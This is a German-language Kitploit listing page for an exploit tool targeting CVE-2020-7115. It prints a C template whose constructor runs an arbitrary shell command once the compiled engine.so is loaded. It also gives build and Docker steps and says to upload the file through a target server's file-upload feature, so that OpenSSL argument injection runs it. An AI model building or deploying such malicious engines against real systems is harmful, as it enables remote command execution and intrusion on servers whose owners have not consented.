Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2020-7115 — Erstelle deine bösartige Engine in Sekunden | Kitploit
Tools/GitHubGitHub/retr02332/cve-2020-7115
Payload-GenerierungSchwachstellenanalyseExploitationShellcodeWebanwendungs-ExploitationPenetrationstests
GitHubretr02332/cve-2020-7115

CVE-2020-7115

Erstelle deine bösartige Engine in Sekunden

Repository anzeigen
1vor 5 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2020-7115

Erstellen Sie Ihre bösartige Engine in Sekunden

build_engine.sh

Einfaches Skript zum Generieren einer bösartigen Engine, die bereit ist, in openssl Argument Injection Szenarien verwendet zu werden.

Wie benutzt man das?

Es ist sehr einfach, ändern Sie einfach die Datei engine.c mit dem gewünschten Befehl:

root@kitploit:~
#include <unistd.h>

__attribute__((constructor))
static void init() {
    execl("/bin/sh", "sh", "-c", "COMMAND");
}

Sobald Sie das getan haben, müssen Sie nur noch das Skript wie folgt ausführen:

root@kitploit:~
bash build_engine.sh

Dieser Befehl erstellt einen Ordner namens output, in dem Sie eine Datei namens engine.so finden, die Sie über eine Datei-Upload-Funktion an den Server senden sollten.

Wie starte ich einen Docker, um das Skript auszuführen, und warum sollte ich das tun?

Es ist wichtig zu wissen, dass Sie die bösartige Engine mit den gleichen Merkmalen wie das Zielsystem erstellen müssen. Das heißt... wenn das Zielsystem auf einem 64-Bit-Linux läuft, müssen Sie die bösartige Engine auf einem 64-Bit-Linux erstellen.

Docker ist eine fantastische Technologie für solche Dinge, und die Einrichtung Ihrer Umgebung ist sehr einfach.

Laden wir zunächst das Docker-Image von dieser Seite für ein 64-Bit-Debian-Linux-System herunter:

root@kitploit:~
sudo docker pull debian

Dann werden wir den Docker wie folgt starten:

root@kitploit:~
sudo docker run -v `pwd`:/code -it debian

Lassen Sie uns ein wenig verstehen, was wir hier gemacht haben. Das Flag -v wird verwendet, um ein Volume zu erstellen; in diesem Fall verknüpfen wir den Inhalt des Ordners /code mit dem Inhalt unseres aktuellen Arbeitsverzeichnisses, daher die Verwendung von pwd.

Mit 'verknüpfen' meine ich, dass alles, was wir in /code (einem Ordner im Root des Docker-Images) erstellen oder bearbeiten, in pwd sichtbar ist und umgekehrt.

In unserem Fall zeigt pwd auf das folgende Verzeichnis auf unserem lokalen Rechner:

/home/retr0/CVE-2020-7115/

Das -it Flag hingegen kann wie folgt verstanden werden:

Das -t (--tty) Flag weist Docker an, eine virtuelle Terminalsitzung innerhalb des Containers zu erstellen. Dies wird üblicherweise mit der -i (--interactive) Option verwendet, die STDIN auch im detached mode offen hält.

Im Effekt ist die Verwendung des -it Flags nützlich, wenn wir eine Shell des betreffenden Containers erhalten möchten.

Kennen Sie CVE-2020-7115 nicht?

Kein Problem, besuchen Sie einfach diesen Beitrag, und ich bin sicher, Sie werden diese Schwachstelle vollständig verstehen.

Tool herunterladen